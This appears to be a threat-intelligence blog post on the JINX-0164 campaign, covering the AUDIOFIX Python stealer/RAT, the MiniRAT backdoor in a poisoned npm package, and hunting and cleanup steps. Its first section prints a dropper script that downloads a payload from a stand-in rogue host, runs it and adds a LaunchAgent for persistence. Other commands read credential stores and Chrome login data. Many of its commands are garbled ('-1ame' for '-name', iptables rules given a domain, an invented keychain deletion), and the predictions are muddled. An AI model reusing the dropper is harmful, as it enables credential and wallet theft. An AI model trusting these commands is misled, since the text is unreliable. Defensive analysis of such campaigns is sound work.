Listen to this Post
Introduction:
Cybercriminals are now weaponizing fake recruiter outreach and poisoned npm packages to target cryptocurrency organizations. Active since mid-2025, the newly identified threat actor JINX‑0164 deploys a Python‑based infostealer and RAT named AUDIOFIX, alongside a Go‑backdoor called MiniRAT, using rogue video‑call domains and compromised software development kits (SDKs) to breach macOS‑based CI/CD pipelines and steal credentials.
Learning Objectives:
– Detect and analyze AUDIOFIX’s bash installer, persistence mechanisms, and masquerading audio driver tactics on macOS.
– Identify compromised npm packages (e.g., @velora‑dex/sdk) and harden CI/CD supply chain security.
– Implement Linux/macOS and Windows commands to hunt for Python‑based RATs, rogue launch agents, and unauthorized outbound connections.
You Should Know:
1. Dissecting the Infection Chain: Fake Recruiter to Rogue Domain
JINX‑0164 initiates contact via LinkedIn or email, impersonating recruiters from legitimate crypto firms. The victim is directed to a rogue domain (e.g., `video‑call‑crypto[.]com` or `driver‑update‑mac[.]com`) that prompts a “mandatory audio driver” download. The delivered bash script (`install_audio.sh`) performs the following:
!/bin/bash Masqueraded as audio driver installer curl -s http://rogue-domain/audiofix.py -o /tmp/audiofix.py python3 /tmp/audiofix.py & Add persistence via launch agent cat > ~/Library/LaunchAgents/com.audio.driver.plist << EOF <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"><dict><key>Label</key><string>com.audio.driver</string> <key>ProgramArguments</key><array><string>python3</string><string>/tmp/audiofix.py</string></array> <key>RunAtLoad</key><true/></dict></plist> EOF launchctl load ~/Library/LaunchAgents/com.audio.driver.plist
Step‑by‑step guide to hunt this:
– On macOS, list all launch agents: `launchctl list | grep -i audio`
– Check for unexpected Python processes: `ps aux | grep -i python | grep -v “/System/”`
– Review bash history for suspicious curl/wget commands: `cat ~/.bash_history | grep -E “(curl|wget).\.(py|sh)”`
2. AUDIOFIX Deep Dive: Python Infostealer + RAT Capabilities
The AUDIOFIX malware (dropped as `audiofix.py`) is an obfuscated Python script that:
– Steals browser credentials (Chrome, Firefox, Brave) via `sqlite3` and `keyring` libraries.
– Exfiltrates SSH keys (`~/.ssh/id_rsa`), AWS/cloud CLI tokens, and cryptocurrency wallet files (`~/.bitcoin`, `~/.solana`, `~/.ethereum`).
– Establishes reverse shell over WebSockets or raw TCP to C2 (port 443 or 8080).
Manual extraction and analysis (Linux/macOS):
Extract strings from suspected Python payload strings audiofix.py | grep -E "http://|https://|socket|steal|exfil" Monitor outbound connections for RAT beaconing sudo lsof -i -P | grep -i python On Windows (if cross-compiled PyInstaller), use netstat: netstat -ano | findstr "ESTABLISHED" | findstr "python"
Mitigation:
– Block outbound ports 443 and 8080 for unsigned Python applications using application firewalls (Little Snitch on macOS, Windows Defender Firewall with rule).
– Deploy EDR rules to detect `python` spawning `bash` or `sh` processes.
3. The MiniRAT Vector: Compromised npm Package @velora‑dex/sdk
JINX‑0164 poisoned the legitimate npm package `@velora-dex/sdk` to deliver MiniRAT – a Go‑based backdoor that achieves cross‑platform persistence. The malicious version (≥1.2.0) contained a post‑install script that downloaded a binary from `hxxp://45.155.xxx.xxx/minirat` and executed it.
Verifying npm supply chain compromise:
Check installed packages for suspicious postinstall scripts npm list --json | grep -A5 "postinstall" Audit specific package version npm audit @velora-dex/sdk Review package.json scripts section cat node_modules/@velora-dex/sdk/package.json | grep -i "script"
Step‑by‑step remediation for CI/CD pipelines:
1. Lock dependency versions using `package-lock.json` or `npm shrinkwrap`.
2. Use npm’s `–ignore-scripts` flag during install in build environments:
`npm install –ignore-scripts`
3. Scan for MiniRAT indicators – the binary communicates over TLS to `c2‑mining[.]top:8443`. Block this domain at proxy or firewall level.
4. Windows detection: MiniRAT drops to `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe`. Run:
`dir /a %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`
`wmic process where “name=’svchost.exe'” get executablepath` (verify legitimate path is `C:\Windows\System32`)
4. Rogue Domains and Video Call Traps – Network Hardening
The attacker registered domains that mimic Zoom, Teams, and driver update portals. Examples from the report: `video-call-crypto[.]com`, `drivers-macos-update[.]net`.
Proactive blocking using DNS and EDR:
– On Linux/macOS, add to `/etc/hosts`:
`0.0.0.0 video-call-crypto.com drivers-macos-update.net`
– On Windows, edit `C:\Windows\System32\drivers\etc\hosts` similarly.
– Deploy a custom Suricata rule to detect `audiofix` user‑agent patterns:
`alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”JINX-0164 AUDIOFIX beacon”; http.user_agent; content:”Python-urllib/3″; sid:1000164;)`
API security tip: Crypto firms often use REST APIs for trading. Enforce mutual TLS (mTLS) and rotate tokens every 6 hours – AUDIOFIX steals plaintext tokens from `~/.aws/credentials` and `~/.config/gcloud`.
5. Credential Theft and Cloud Hardening Commands
AUDIOFIX specifically targets `~/.aws/credentials`, `~/.config/gcloud/application_default_credentials.json`, and `~/.kube/config`. Once exfiltrated, attackers pivot to cloud resources.
Linux/macOS – hunt for credential access:
Find all credential files modified in last 24h find ~ -1ame "credentials" -o -1ame ".json" -o -1ame "config" | xargs ls -la Monitor process access to sensitive files using opensnoop (macOS) sudo opensnoop -1 python | grep -E "\.aws|\.kube|\.ssh"
Windows equivalents (if Python script runs via WSL or PyInstaller):
Monitor file access to credential stores
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4663} | Where-Object {$_.Message -match "credentials"}
List all stored Windows Credentials
cmdkey /list
Dump Chrome login data (common target)
type "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"
Cloud Hardening Step‑by‑step:
– Enforce short‑lived AWS STS tokens (max 1 hour) instead of long‑term access keys.
– Use Azure Managed Identities or GCP Workload Identity to eliminate static credential files.
– Deploy a honeytoken file named `~/.aws/credentials` on macOS endpoints – alert on any read access.
6. Persistence Removal and Incident Response Checklist
If JINX-0164 compromise is suspected, execute the following containment and eradication steps:
On macOS:
1. Unload and delete malicious launch agent
launchctl unload ~/Library/LaunchAgents/com.audio.driver.plist
rm ~/Library/LaunchAgents/com.audio.driver.plist
2. Kill Python RAT processes
pkill -f audiofix.py
3. Remove dropper and payload
rm /tmp/audiofix.py
rm ~/Library/Application\ Support/AudioDriver/
4. Check for MiniRAT binary (often in /usr/local/bin/mini)
find /usr/local -type f -executable -1ame "mini" -exec strings {} \; | grep "c2-mining"
5. Reset all credentials (SSH, AWS, browser)
rm ~/.ssh/id_rsa && ssh-keygen -t rsa -b 4096
Clear browser saved passwords via Chrome's settings or use:
security delete-generic-password -a "$USER" -s "chrome-passwords"
On Linux servers (CI/CD runners):
Audit npm global installs npm ls -g --depth=0 | grep -E "@velora-dex|minirat" Remove malicious npm package and clear npm cache npm uninstall -g @velora-dex/sdk npm cache clean --force Block C2 IPs using iptables sudo iptables -A OUTPUT -d 45.155.xxx.xxx -j DROP sudo iptables -A OUTPUT -d c2-mining.top -j DROP
What Undercode Say:
– Key Takeaway 1: JINX-0164’s dual‑pronged approach – social engineering via fake recruiters plus supply chain attack on npm – shows that macOS is no longer a “safe harbor” for crypto firms. The use of Python as a living‑off‑the‑land tool makes detection harder because Python is preinstalled on macOS and frequently used legitimately.
– Key Takeaway 2: The AUDIOFIX RAT’s ability to target CI/CD systems (by stealing `KUBECONFIG` and `AWS_SECRET_ACCESS_KEY`) indicates a strategic shift: attackers want source code and build pipeline secrets, not just endpoint wallets. This enables deeper supply chain poisoning downstream.
Analysis (~10 lines):
The JINX-0164 campaign reflects a maturation of macOS‑targeting malware, blending North Korean–like tactics (fake IT job lures) with custom tooling (Python RAT + Go backdoor). However, the lack of infrastructure links to known DPRK groups suggests either a copycat or a new threat actor. For defenders, the most critical gap is monitoring outbound traffic from Python processes – standard EDRs often allow Python because it’s signed by Apple. Implement application allowlisting on build servers and enforce that `python3` cannot initiate network connections unless explicitly whitelisted. Also, the npm package poisoning highlights the need for internal package registries (Artifactory, Nexus) that block newly published packages until security review. Finally, crypto firms should simulate “recruiter phishing” with payloads that mimic AUDIOFIX – most employees will click a “driver update” from a fake Zoom domain.
Prediction:
– +1 Expect increased use of Python‑based RATs on macOS as attackers realize that many security tools focus on Windows PE files and Mach‑O binaries, ignoring interpreted scripts.
– -1 JINX-0164 will likely expand to target Windows via PyInstaller‑compiled versions of AUDIOFIX, leveraging the same npm package vector but dropping a Windows executable.
– -1 Over the next 12 months, threat actors will pivot to compromising crypto firms’ CI/CD pipelines directly via poisoned GitHub Actions or GitLab CI templates – the MiniRAT backdoor is a proof of concept.
– +1 The security community will release open‑source YARA rules for AUDIOFIX and MiniRAT within weeks, and npm plans to introduce mandatory 2FA for all package maintainers in Q3 2026, reducing supply chain risks.
▶️ Related Video (66% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Mohit Hackernews](https://www.linkedin.com/posts/mohit-hackernews_jinx-0164-a-new-threat-actor-targets-share-7465674051408211968-J3id/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)
